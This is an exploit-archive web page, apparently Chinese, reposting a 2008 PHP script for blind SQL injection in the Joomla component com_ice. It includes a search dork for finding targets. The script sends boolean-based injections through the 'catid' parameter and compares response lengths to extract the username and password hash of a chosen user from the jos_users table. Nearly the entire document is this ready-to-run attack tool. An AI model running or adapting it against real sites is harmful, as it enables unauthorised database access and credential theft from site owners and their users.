Joomla Component com_ice 0.5b2 Blind SQL Injection Exploit
|
来源:ice.gallery@gmx.net 作者:Gallery 发布时间:2008-12-29
|
|
<?php ini_set("max_execution_time",0); print_r(' ############################################################# #Joomla Component com_ice(catid) Blind SQL-injection Exploit ############################################################# #[~] Author : Mountassif Moad #[~] Evil finger : v4 Team #[~] Greetz : All freind #[~] Vulnerability : Blind SQL injection #[~] Dork : iinurl:com_ice "catid" -------------------------------------------------- #[!] <name>Ice Gallery</name> #[!] <creationDate>29/08/06</creationDate> #[!] <author>Markus Donhauser</author> #[!] <authorEmail>ice.gallery@gmx.net</authorEmail> #[!] <version>0.5 beta 2</version> ############################################################### '); $portal="com_ice"; if ($argc > 1) { $url = $argv[1]; if ($argc < 3) { $userid = 1; } else { $userid = $argv[2]; } $r = strlen(file_get_contents($url."/index.php?option=".$portal."&catid=1+and+1=1")); echo "\nExploiting:\n"; $w = strlen(file_get_contents($url."/index.php?option=".$portal."&catid=1+and+1=0")); $t = abs((100-($w/$r*100))); echo "\nNickname: "; for ($i=1; $i <= 30; $i++) { $laenge = strlen(file_get_contents($url."/index.php?option=".$portal."&catid=1+and+ascii(substring((select+username+from+jos_users+where+id=".$userid."+limit+0,1),".$i.",1))!=0")); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."/index.php?option=".$portal."&catid=1+and+ascii(substring((select+username+from+apa_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."/index.php?option=".$portal."&catid=1+and+ascii(substring((select+username+from+jos_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } echo "\nPassword: "; for ($j = 1; $j <= 32; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."/index.php?option=".$portal."&catid=1+and+ascii(substring((select+password+from+jos_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."/index.php?option=".$portal."&catid=1+and+ascii(substring((select+password+from+jos_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } else { echo "\nExploiting failed: By Stack\n"; } ?>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|